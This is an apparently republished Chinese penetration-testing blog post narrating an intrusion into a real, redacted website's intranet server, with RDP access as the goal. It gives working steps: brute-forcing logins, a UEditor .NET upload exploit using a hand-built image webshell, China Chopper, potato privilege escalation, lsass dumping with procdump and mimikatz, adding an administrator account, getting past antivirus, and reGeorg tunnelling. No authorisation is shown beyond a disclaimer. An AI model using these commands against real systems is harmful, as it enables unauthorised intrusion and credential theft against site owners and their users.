實戰擼進內網服務器 (Bypass)
聲明:該公眾號大部分文章來自作者日常學習筆記,也有部分文章是經過作者授權和其他公眾號白名單轉載,未經授權,嚴禁轉載,如需轉載,聯系開白。 請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。 |
0x01 前言
本次教程較為基礎,打碼比較嚴重,有很多不足的地方,希望各位大佬能夠指正。
目標站:http://xxx.com,要求:登錄遠程桌面
0x02 正文
通過超級ping檢測出網站的IP 直接訪問ip ...
通過FOFA Pro View插件可以快速的掃描出開放的端口 (由于更新,之前的不能用了,修改下地址就可以了)
還有Wappalyzer這個插件也比較好用快速檢測出網站的中間件等
這里我比較疑惑asp.net,一般都是搭配mssql數據庫吧,它上面顯示開放3306。。。我訪問一下直接 403
目錄掃描掃出了后臺
嘗試下弱口令
他這里會校驗用戶名,通過檢測不會對訪問次數進行限制,那還等啥?burp一梭跑, 剛好讓他嘗嘗我大字典的厲害
最終我還是敗了,啥也別說了,上神器xray,出來打工之前白嫖的高級版還沒上手。
今天試試水,這款工具還是蠻好用的,啥也不說,開干(我懶,就使用基礎爬蟲+掃描網站了)。
xray官方使用說明:
https://docs.xray.cool/#/tutorial/introduce
。。。有點尬 只能手動測試下了, 習慣性的查看一下有沒有目錄遍歷漏洞 (我自己的手法: 找到一張圖片->右鍵復制地址到地址欄->查看相關路徑->訪問)(注意:圖片一般最好選擇文章或者資料里面的 別問,問就是直覺)
哦啊,沒發現目錄遍歷但是發現了ueditor,聯想到之前插件掃到的web框架是 .net的, 有篇文章是專門講解有關Ueditor .net下的漏洞的
https://www.freebuf.com/vuls/181814.html
先訪問一下路徑顯示
利用poc上傳(自己構造好html上傳界面,然后上傳自己服務器上的圖片馬用 ? 進行截斷就可以了)服務器:白嫖一年彩虹云云主機,圖片馬: 非常簡單,我們只需要一張圖片1.jpg、一句話木馬寫好的aspx文件1.aspx,之后我們進入到命令行。
注意:將aspx文件和圖片文件放到同一目錄下,cmd也要跳轉到放文件的目錄下之后執行命令:copy 1.jpg/b + 1.aspx/a 2.jpg,新生成的2.jpg就是制作好的圖片馬了。
將POC中的url更換成我們的目標站,上傳格式 http://myweb.com/1.jpg?.aspx
上傳成功,直接返回一句話地址
成功解析,上菜刀
成功getshell ,查看下權限
這權限屬實有點小,不過還能執行命令 ipconfig 發現是 內網。。。怪不得
Systeminfo
2012 修補了8個補丁 先祭出神站 在線exp對比,非常值得推薦,https://i.hacking8.com/tiquan。
這里看到 2012 啥也別說爛土豆一梭跑,發現上傳不上。。。
剛開始我以為是權限的問題,后來發現每個文件夾我都不能上傳。。。
搞得我一臉懵*,是不是因為菜刀的問題,那就直接先寫入一個aspx的查詢可讀可寫目錄的馬子
成功寫入并查詢成功 然后新建一個大馬
不是吧,這么難的嗎?還好我有預編譯出錯的shell
成功,然后配合我的可讀可寫的馬子,成功上傳爛土豆
提權成功,get到system權限,接下來就是找3389了:netstat -ano
看到一個33890,越看越像3389,tasklist -svc : 查看系統進程,找到對應的pid
不得不吐槽一下這個管理員真的有點2...,3389端口到手,內網IP到手,system權限到手,接下來直接添加賬號登錄了
Net user abc abc /add 添加賬號net localgroup administrators abc /add 將用戶添加到管理員
執行命令發現無回顯,剛開始以為對賬號密碼的長度有限制,但是測試了很多次發現不是這個問題,
明明是system權限為什么不能添加用戶呢?在白天打工的時候用手機找到很多類似對應的情況:有殺軟、對賬號密碼有限制、防火墻等等,并且從網上找到了很多繞過的姿勢 晚上回到家二話不說就開干,tasklist -svc
經過我一個一個的百度,終于發現了問題所在,原來存在火絨。。。(對殺毒軟件進程不是很了解)
其實這里我想說明一下,很多人習慣性的遇到一點很問題就問別人,其實完全可以自己先百度一下,這樣不僅可以加深對問題的記憶,將來在遇到同類型問題的時候也可以快速的找到解決的思路
利用白天找到的思路,可以先kill掉火狐的進程,但是事情往往是那么的不盡人意
。。。n m 玩雞毛 再試試另一種方法,直接mimimakatz讀取administrator的密碼。
但是這里是server2012,嘗試使用procdump來導出目標主機的lsass.dmp,到本機用mimikatz讀取密碼
1.導出lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
2.執行mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
前提需要管理員權限,讀出了hash沒讀出明文密碼
Sha1解密不出來,還嘗試了很多姿勢,都沒有成功,只能求助大佬了
啥話不說直接開干
成功繞過并添加到了管理員組,由于是內網我們直接上 Proxifier+reGeorg(之前遇到過一次內網的環境就是用的這個組合)
相關使用方法可以參考以下鏈接進行了解
https://www.freebuf.com/column/206524.html
然后就。。。
任務完成 打掃戰場 收工
0x03 總結
安裝相關瀏覽器插件會很方便的進行信息收集,遇到問題不要一股腦的問別人,先想辦法自己解決。多收集一些好用的工具、網站等,用的時候直接就能甩過來。多總結自己的經驗和收獲,這樣你才能在實戰中快速上手
